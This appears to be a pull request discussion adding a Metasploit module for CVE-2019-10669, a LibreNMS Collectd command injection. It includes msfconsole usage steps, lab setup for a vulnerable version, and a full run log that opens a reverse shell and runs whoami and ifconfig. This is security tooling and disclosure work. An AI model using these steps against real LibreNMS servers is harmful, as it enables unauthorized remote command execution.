Add module for LibreNMS CVE-2019-10669

[space-r7]

A command injection vulnerability exists in LibreNMS versions prior to v1.50.1.

The injection vulnerability affects the Collectd graphing functionality. Specifically, the to and from parameters used in the range for graphing are sanitized with the mysqli_escape_real_string() which ignores certain characters, including backticks. These improperly sanitized parameters are then used in a shell command that gets executed via the passthru() function.

This module has been tested on LibreNMS v1.46 and v.1.50.

Resolves #12100

Verification

• Install the application
• Start msfconsole
• Do: use exploit/linux/http/librenms_collectd_cmd_inject
• Do: set RHOSTS <ip>
• Do: set USERNAME <user>
• Do: set PASSWORD <pass>
• Do: run
• You should get a shell.

Vulnerable Setup

A vulnerable version of LibreNMS (v1.50) in the form of an OVA can be downloaded here.

Login credentials can be found on the official LibreNMS site.

Collectd will need to be set up with LibreNMS for this exploit to work. These instructions
are for the Ubuntu OVA.

sudo apt-get install collectd

Open the Collectd config file /etc/collectd/collectd.conf
and uncomment the global options for the Hostname and BaseDir.
Next, uncomment the lines for the cpu plugin.
The plugin should look similar to this:

<Plugin cpu>
  ReportByCpu true
  ReportByState true
  ValuesPercentage false
</Plugin>

Next, find the rrdtool plugin and ensure it looks like this:

<Plugin rrdtool>
   DataDir "/var/lib/collectd/rrd"
   CacheTimeout 120
   CacheFlush   900
</Plugin>

Save and exit

Now open /etc/collectd/collectd.conf.d/rrdtool.conf and add

LoadPlugin rrdtool
<Plugin rrdtool>
  DataDir "/var/lib/collectd/rrd"
  CacheTimeout 120
  CacheFlush   900
</Plugin>

Save and exit, then restart the Collectd service:

sudo systemctl restart collectd

Lastly, add these two lines to the LibreNMS config file,
/opt/librenms/config.php:

$config['collectd_dir'] = '/var/lib/collectd/rrd';
$config['collectd_sock'] = 'unix:///var/run/collectd.sock';

Now save and exit.

You can verify that Collectd is set up with LibreNMS by viewing the
localhost device in LibreNMS and noting that there should be a Collectd
tab on the device's main page. Additional configuration information can be found here.

[bcoles]

Did you have any luck with the auth bypass ?

[space-r7]

Did you have any luck with the auth bypass ?

I had luck with the actual graphing page not requiring auth, but the exploit needs a valid collectd plugin in order to work. Checking for collectd and a valid plugin required auth.

[jvoisin]

You can also take a look at #9213 :P

[space-r7]

You can also take a look at #9213 :P

Tried out that method and had no luck with it.

[bwatters-r7]

msf5 exploit(linux/http/librenms_collectd_cmd_inject) > show options

Module options (exploit/linux/http/librenms_collectd_cmd_inject):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   D32fwefwef       yes       Password for LibreNMS
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.135.185  yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base LibreNMS path
   USERNAME   librenms         yes       User name for LibreNMS
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf5 exploit(linux/http/librenms_collectd_cmd_inject) > run

[*] Started reverse TCP double handler on 192.168.135.168:4444 
[*] Successfully logged into LibreNMS. Storing credentials...
[*] LibreNMS version: 1.50
[*] Sending payload via device 1
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xUnJ4MTYK9Us4Bu9;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "xUnJ4MTYK9Us4Bu9\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.135.168:4444 -> 192.168.135.185:59204) at 2019-09-06 11:31:31 -0500

whoami
www-data
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.135.185  netmask 255.255.255.0  broadcast 192.168.135.255
        inet6 fe80::a00:27ff:fe12:fd25  prefixlen 64  scopeid 0x20<link>
        inet6 fd34:fe56:7891:2f3a:a00:27ff:fe12:fd25  prefixlen 64  scopeid 0x0<global>
        ether 08:00:27:12:fd:25  txqueuelen 1000  (Ethernet)
        RX packets 1043  bytes 340658 (340.6 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1052  bytes 949497 (949.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 676  bytes 102149 (102.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 676  bytes 102149 (102.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

[pbarry-r7]

Release Notes

This adds a new module for exploiting an injection vulnerability in LibreNMS Collectd graphing functionality for versions of LibreNMS prior to v1.50.1.